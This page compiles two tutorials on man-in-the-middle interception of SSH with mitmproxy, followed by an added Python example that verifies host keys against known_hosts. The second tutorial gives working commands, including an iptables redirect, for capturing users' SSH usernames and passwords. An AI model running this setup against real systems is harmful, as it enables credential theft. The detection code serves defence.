MITM: mitm ssh
Sources:
* https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
* http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
Revision as of 04:08, 5 April 2017
source: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
Quick and Easy SSH MITM
Published: Thu 13 March 2014
By Andrew Smith
In Blog.
tags: ssh mitm
A quick intro to using mitmproxy to man-in-the-middle an SSH connection.
So you want to sniff an SSH connection (that you have access to) but Wireshark is giving you junk? Luckily someone has written a tool for that. The mitmproxy by Maximilian Hils allows you to plop a fake server in between your SSH client and the SSH server you're connecting to.
I wanted to have a nose at the data sent from git to github over SSH. This is what I did.
- Download mitmproxy
git clone https://github.com/mitmproxy/mitmproxy.git
- Generate mitm keys (these go to ~/.mitmkeys)
./mitmkeys
Now you want to install the SSH key you just generated to the server you want to mitm.
- Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Then run the proxy, pointing it at the victimserver.
- Run proxy
./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
Setup information
- diagram: client --> mitmproxy --> ssh server
- target server IP: 192.168.202.124
1- install dependency packages
$ sudo pip install twisted
$ sudo apt-get install python-service-identity
$ pip install pycrypto
2- download the mitmproxy
$ git clone https://github.com/saironiq/mitmproxy.git
3- if you cannot run mitmreplay_ssh, the pycrypto version you installed may have a different module layout, so:
- modify the file mitmproxy/mitmproxy/sshdebug.py
-- at line 655, change it to the following:
mpints.append(cnumber.bytes_to_long(
-- at line 11, add the following line:
from Crypto.Util import number as cnumber
4- generate keys
$ cd mitmproxy
$ sudo ./mitmproxy
5- update the ip_forward rule and NAT
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
6- run mitmproxy_ssh and point it at the target server 192.168.202.124
$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
7- now, when our client logs in to the SSH server, if they do not question the new server key, the proxy is completely transparent to the client
- [snapshot: username and password captured on our mitmproxy PC when the client connects by SSH to server 192.168.202.124]
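Both walkthroughs above turn on the same client-side decision: in step 7 the interception only stays transparent if the user accepts "the new key from server" instead of the key already recorded for that host, and step 3 patches sshdebug.py to decode SSH multi-precision integers with pycrypto's bytes_to_long. The Python below is an added example, not code from either tutorial or from the mitmproxy project. It decodes SSH wire-format public-key blobs with the standard library alone (int.from_bytes standing in for the cnumber.bytes_to_long call from step 3), computes OpenSSH-style SHA256 fingerprints, and runs the known_hosts comparison a client should complete before it sends a password. The hostnames, the known_hosts lines and all key material are constructed for the example (they are not real keys); the address 192.168.202.124 is the one the page uses.

```python
import base64
import hashlib
import struct


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH 'string' (RFC 4251): uint32 big-endian length + payload."""
    return struct.pack(">I", len(data)) + data


def ssh_mpint(value: int) -> bytes:
    """Encode a non-negative int as an SSH 'mpint' (leading 0x00 if the top bit is set)."""
    if value == 0:
        return ssh_string(b"")
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return ssh_string(raw)


def read_string(blob: bytes, offset: int):
    """Read one SSH 'string' at offset; return (payload, offset after it)."""
    if offset + 4 > len(blob):
        raise ValueError("truncated length field")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    end = offset + 4 + length
    if end > len(blob):
        raise ValueError("truncated string payload")
    return blob[offset + 4:end], end


def read_mpint(blob: bytes, offset: int):
    """Read an SSH 'mpint'; stdlib stand-in for step 3's cnumber.bytes_to_long(...)."""
    raw, offset = read_string(blob, offset)
    return int.from_bytes(raw, "big", signed=True), offset  # two's complement per RFC 4251


def parse_public_key_blob(blob: bytes) -> dict:
    """Parse the base64-decoded blob of an OpenSSH public-key / known_hosts line."""
    key_type, off = read_string(blob, 0)
    key = {"type": key_type.decode()}
    if key["type"] == "ssh-rsa":
        key["e"], off = read_mpint(blob, off)
        key["n"], off = read_mpint(blob, off)
    elif key["type"] == "ssh-ed25519":
        key["pk"], off = read_string(blob, off)
    else:
        raise ValueError("unsupported key type " + key["type"])
    if off != len(blob):
        raise ValueError("trailing bytes after key")
    return key


def fingerprint_sha256(blob: bytes) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of SHA-256(blob)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_known_hosts(text: str) -> dict:
    """Map host patterns to (key_type, blob); skips '#' comments, '@' markers, hashed '|1|' lines."""
    pinned = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#@|":
            continue
        hosts, key_type, b64 = line.split()[:3]       # 'h1,h2 type b64' or '[host]:port type b64'
        for host in hosts.split(","):
            pinned[host] = (key_type, base64.b64decode(b64))
    return pinned


def check_host_key(pinned: dict, host: str, key_type: str, blob: bytes, port: int = 22) -> str:
    """Return 'match', 'mismatch' or 'unknown'; 'mismatch' is the warning step 7 needs the user to ignore."""
    name = host if port == 22 else "[%s]:%d" % (host, port)
    entry = pinned.get(name)
    if entry is None:
        return "unknown"  # trust-on-first-use prompt; nothing on record to compare
    return "match" if entry == (key_type, blob) else "mismatch"


# Constructed key blobs (not real key material); the 1024-bit "modulus" with its top bit set
# exercises the mpint leading-zero rule. PROXY_BLOB plays the key the proxy would present.
REAL_SERVER_BLOB = ssh_string(b"ssh-rsa") + ssh_mpint(65537) + ssh_mpint((1 << 1023) | 12345)
PROXY_BLOB = ssh_string(b"ssh-rsa") + ssh_mpint(65537) + ssh_mpint((1 << 1023) | 54321)
ED25519_BLOB = ssh_string(b"ssh-ed25519") + ssh_string(bytes(range(32)))

# Constructed known_hosts pinning the page's target address and a port-2222 entry.
KNOWN_HOSTS = "\n".join([
    "# constructed sample known_hosts",
    "192.168.202.124,gitserver.lab ssh-rsa " + base64.b64encode(REAL_SERVER_BLOB).decode(),
    "[gitserver.lab]:2222 ssh-ed25519 " + base64.b64encode(ED25519_BLOB).decode(),
])
PINNED = parse_known_hosts(KNOWN_HOSTS)


def demo() -> dict:
    """The checks a client should complete before it sends a password."""
    return {
        "real_server": check_host_key(PINNED, "192.168.202.124", "ssh-rsa", REAL_SERVER_BLOB),
        "proxy_key": check_host_key(PINNED, "192.168.202.124", "ssh-rsa", PROXY_BLOB),
        "port_2222": check_host_key(PINNED, "gitserver.lab", "ssh-ed25519", ED25519_BLOB, port=2222),
        "never_seen": check_host_key(PINNED, "other.lab", "ssh-rsa", REAL_SERVER_BLOB),
        "modulus_bits": parse_public_key_blob(REAL_SERVER_BLOB)["n"].bit_length(),
    }


if __name__ == "__main__":
    print(demo(), fingerprint_sha256(REAL_SERVER_BLOB), fingerprint_sha256(PROXY_BLOB))
```

The "proxy_key" result of demo() is the situation of step 7: the host is on record, but the key offered does not match, so the client should stop rather than authenticate. OpenSSH reports this as a changed host key, and with StrictHostKeyChecking set to yes it refuses the connection outright and never offers to add an unknown host, which removes the user decision the interception depends on. Comparing the printed fingerprints against the value published out of band for the server is the manual form of the same check.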